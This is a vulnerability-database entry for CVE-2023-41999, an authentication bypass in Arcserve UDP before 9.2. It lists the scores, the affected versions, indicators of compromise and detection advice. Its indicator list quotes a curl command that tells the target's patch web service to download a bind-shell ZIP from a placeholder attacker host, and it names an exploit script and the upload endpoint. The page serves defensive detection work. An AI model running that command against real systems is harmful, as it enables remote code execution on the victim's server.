cbcvebase.
CVE-2023-41999
published 2023-11-27

CVE-2023-41999: An authentication bypass exists in Arcserve UDP prior to version 9.2. An unauthenticated, remote attacker can obtain a valid authentication identifier that…

PriorityP269critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EPSS
1.44%
69.8th percentile
An authentication bypass exists in Arcserve UDP prior to version 9.2. An unauthenticated, remote attacker can obtain a valid authentication identifier that allows them to authenticate to the management console and perform tasks that require authentication.

Affected

2 ranges
VendorProductVersion rangeFixed in
arcservearcserve_udp< 9.29.2
arcserveudp< 9.29.2

Detection & IOCsextracted from sources · hover to see the quote

commandcurl -ki -H 'Content-Type: text/xml' -d 'http://<attacker>:8000/download/shell_bind_tcp.zip' 'https://<target>:8014/RPSWebServiceImpl/services/RPSService4CPMImpl'
port8014
url/RPSWebServiceImpl/services/RPSService4CPMImpl
path\Engine\BIN\patch\
commandpython3 arcserve_udp_console_auth_bypass.py
url/fileHandling?action=upload
  • Monitor for unauthenticated calls to ValidateUserByUUID() on the Arcserve UDP management console, which is the mechanism exploited to obtain a valid authentication UUID without credentials.
  • Alert on unauthenticated access to the getEdgeAccount API endpoint post-authentication-bypass, which exposes administrative credentials including encrypted passwords.
  • Detect inbound requests to /RPSWebServiceImpl/services/RPSService4CPMImpl on port 8014 with Content-Type: text/xml from unauthenticated sources, which may indicate exploitation of the downloadAndInstallPatch() RCE vector (CVE-2023-41998, related context).
  • Monitor for new file creation under \Engine\BIN\patch\ on Arcserve UDP hosts, especially ZIP or EXE files, which may indicate exploitation of the downloadAndInstallPatch() routine.
  • Watch for processes spawned as 'nt authority\system' from the Arcserve Tomcat directory, which is indicative of successful RCE post-exploitation.
  • ·The authentication bypass (CVE-2023-41999) relies on the UUID-based authentication mechanism (ValidateUserByUUID) being exposed to unauthenticated remote attackers; this is a design-level weakness in the management console's authentication flow.
  • ·The vulnerability affects Arcserve UDP prior to version 9.2; patches are also available for UDP 7.0u2, 8.1, and 9.1 for customers unable to upgrade.
Stop checking back — get the weekly exploitation signal.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.